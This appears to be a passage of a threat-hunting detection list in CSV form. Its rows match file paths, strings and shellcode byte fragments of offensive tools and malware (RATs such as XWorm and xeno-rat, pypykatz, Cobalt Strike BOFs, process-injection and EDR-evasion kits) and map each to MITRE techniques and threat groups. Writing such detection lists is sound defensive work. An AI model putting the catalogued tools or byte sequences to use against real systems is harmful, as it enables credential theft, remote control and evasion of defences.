"*\wstunnel\certs\*",".{0,1000}\\wstunnel\\certs\\.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","19879" "*\wwwwwwwwwwwwntdll.dll*",".{0,1000}\\wwwwwwwwwwwwntdll\.dll.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","19882" "*\x24\xC3\C:\\Windows\\System32\\calc.exe\x00*",".{0,1000}\\x24\\xC3\\C\:\\\\Windows\\\\System32\\\\calc\.exe\\x00.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","19883" "*\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69*",".{0,1000}\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x77\\x68\\x6f\\x61\\x6d\\x69.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","19884" "*\x44\x8b\x01\x44\x39\x42*",".{0,1000}\\x44\\x8b\\x01\\x44\\x39\\x42.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19885" "*\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72*",".{0,1000}\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x0e\\x1f\\xba\\x0e\\x00\\xb4\\x09\\xcd\\x21\\xb8\\x01\\x4c\\xcd\\x21\\x54\\x68\\x69\\x73\\x20\\x70\\x72.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","19886" "*\x64\Debug\Appblock.exe*",".{0,1000}\\x64\\Debug\\Appblock\.exe.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network 
stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","19887" "*\x64\Release\indirect.exe *",".{0,1000}\\x64\\Release\\indirect\.exe\s.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","19889" "*\x64\Stardust.asm*",".{0,1000}\\x64\\Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19890" "*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*",".{0,1000}\\x83\\x64\\x24\\x30\\x00\\x48\\x8d\\x45\\xe0\\x44\\x8b\\x4d\\xd8\\x48\\x8d\\x15.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19891" 
"*\x8b\x31\x39\x72\x10\x75*",".{0,1000}\\x8b\\x31\\x39\\x72\\x10\\x75.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19893" "*\Xclipboard.ps1*",".{0,1000}\\Xclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19894" "*\Xena RAT - 2.0.0.exe*",".{0,1000}\\Xena\sRAT\s\-\s2\.0\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19895" "*\xeno rat server.*",".{0,1000}\\xeno\srat\sserver\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19896" "*\xeno rat server\*",".{0,1000}\\xeno\srat\sserver\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19897" "*\xeno-rat\*",".{0,1000}\\xeno\-rat\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19898" "*\xeno-rat-main*",".{0,1000}\\xeno\-rat\-main.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19899" "*\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48*",".{0,1000}\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","19906" "*\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\*",".{0,1000}\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","19907" "*\XHVNC.exe*",".{0,1000}\\XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19908" "*\XiebroC2-main*",".{0,1000}\\XiebroC2\-main.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","19909" "*\XKlog.txt*",".{0,1000}\\XKlog\.txt.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19910" "*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","19912" "*\XOR_b64_encrypted\*",".{0,1000}\\XOR_b64_encrypted\\.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","19918" "*\xorencrypt.py*",".{0,1000}\\xorencrypt\.py.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","19919" 
"*\xp_evil_template.cpp*",".{0,1000}\\xp_evil_template\.cpp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19920" "*\XpertRAT.exe*",".{0,1000}\\XpertRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19921" "*\xpipe.c*",".{0,1000}\\xpipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","19922" "*\xpipe.o*",".{0,1000}\\xpipe\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 
- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","19923" "*\xRAT 2.exe*",".{0,1000}\\xRAT\s2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19924" "*\xrat-master\*",".{0,1000}\\xrat\-master\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19925" "*\XRulez.cpp*",".{0,1000}\\XRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - 
TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19926" "*\XRulez.exe*",".{0,1000}\\XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19927" "*\XRulez.sln*",".{0,1000}\\XRulez\.sln.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19928" "*\XRulez.zip*",".{0,1000}\\XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19929" "*\XRulez\Injector\*",".{0,1000}\\XRulez\\Injector\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19930" "*\XtremeRat.exe*",".{0,1000}\\XtremeRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Molerats - Packrat - TA558","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19931" "*\XWorm RAT V*",".{0,1000}\\XWorm\sRAT\sV.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19932" "*\XWorm.config*",".{0,1000}\\XWorm\.config.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19933" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19934" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - 
TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19935" "*\XWorm.rar*",".{0,1000}\\XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19936" "*\XWorm.zip*",".{0,1000}\\XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19937" "*\XWorm-RAT-*",".{0,1000}\\XWorm\-RAT\-.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19938" "*\yanluowang.txt*",".{0,1000}\\yanluowang\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19940" "*\ysoserial\*",".{0,1000}\\ysoserial\\.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
